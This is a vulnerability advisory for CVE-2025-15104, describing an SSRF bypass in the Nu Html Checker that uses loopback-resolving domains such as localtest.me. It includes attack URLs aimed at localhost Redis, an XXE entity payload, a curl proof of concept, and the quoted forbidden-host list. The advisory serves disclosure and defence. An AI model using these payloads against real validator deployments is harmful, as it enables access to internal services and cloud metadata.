Nu Html Checker (validator.nu) - Restriction bypass vulnerability allowing local SSRF

Description

Nu Html Checker (validator.nu) contains a restriction bypass that allows remote attackers to make the server perform arbitrary HTTP/HTTPS requests to internal resources, including localhost services. While the validator implements hostname-based protections to block direct access to localhost and 127.0.0.1, these controls can be bypassed using DNS rebinding techniques with domains that resolve to loopback addresses (e.g., localtest.me → 127.0.0.1).

The vulnerability affects the HTML5 validator service widely used by developers, CI/CD pipelines, and automated testing tools. The bypass allows attackers to access internal services that were intended to be protected by the localhost filtering.

Vulnerability

The vulnerability is exploitable through two attack vectors:

1. Direct SSRF via doc URL parameter

• Simple GET request: http://validator.example.com/?doc=http://localtest.me:6379

• Bypasses localhost protection using DNS that resolves to 127.0.0.1

• Clickable link that can be shared via email, Slack, bug reports, or documentation

• Automatically triggered by CI/CD pipelines that validate URLs

• Example: http://localhost:8888/?doc=http%3A%2F%2Flocaltest.me%3A6379 (attacks Redis on localhost)

2. SSRF via XML External Entities (when using parser=xmldtd):

• Leverages the XML DTD validation feature that allows external entities

• Same DNS rebinding bypass applies: <!ENTITY xxe SYSTEM "http://localtest.me:6379/">

• Used when the attacker controls the XML/HTML content being validated.

Both attack vectors share the same validator, which implements two security controls that are both insufficient

    private static final List<String> FORBIDDEN_HOSTS = Arrays.asList( //
            "localhost", //
            "127.0.0.1", //
            "0.0.0.0", //
            "[::1]", //
            "[0:0:0:0:0:0:0:1]", //
            "[0000:0000:0000:0000:0000:0000:0000:0001]", //
            "[::]", //
            "[::0]", //
            "[0000:0000:0000:0000:0000:0000:0000:0000]", //
            "[0:0:0:0:0:0:0:0]" //
    );
...           
 if (FORBIDDEN_HOSTS.contains(url.host().toHostString())) {
                throw new IOException( "Forbidden host.");
            }
            if (url.port() != 80 && url.port() != 81 && url.port() != 443
                    && url.port() < 1024) {
                throw new IOException("Forbidden port.");
            }

1. Hostname-based localhost blocking: Blocks strings like localhost and 127.0.0.1, but does not:

• Resolve DNS before validation

• Block domains that resolve to private/loopback IP addresses

• Validate the final resolved IP address after DNS lookup

2. Port filtering: Only allows ports 80, 81, 443, and ports > 1024, but:

• Most modern services run on high ports (Redis 6379, MySQL 3306, Elasticsearch 9200, etc.)

• Web applications commonly use ports like 3000, 4200, 5000, 8000, 8080, 8888, 9000

• Cloud metadata services use port 80 (169.254.169.254:80)

PoC

curl -X POST http://localhost:8888/\?parser\=xmldtd \                                                       
  -H "Content-Type: application/xhtml+xml" \                                         
  --data '<?xml version="1.0"?>
<!DOCTYPE html [<!ENTITY xxe SYSTEM "http://localtest.me:8080/ssrf">]>
<html xmlns="http://www.w3.org/1999/xhtml">
  <head><title>SSRF</title></head>
  <body><p>&xxe;</p></body>
</html>

Evidence of Exploitation

Our security policy

We have reserved the ID CVE-2025-15104 to refer to this issue from now on.

Disclosure policy

System Information

• The Nu Html Checker (vnu).

• Version latest

• Operating System: Any

References

• Github Repository: https://github.com/validator/validator

Credits

The vulnerability was discovered by Oscar Uribe from Fluid Attacks' Offensive Team.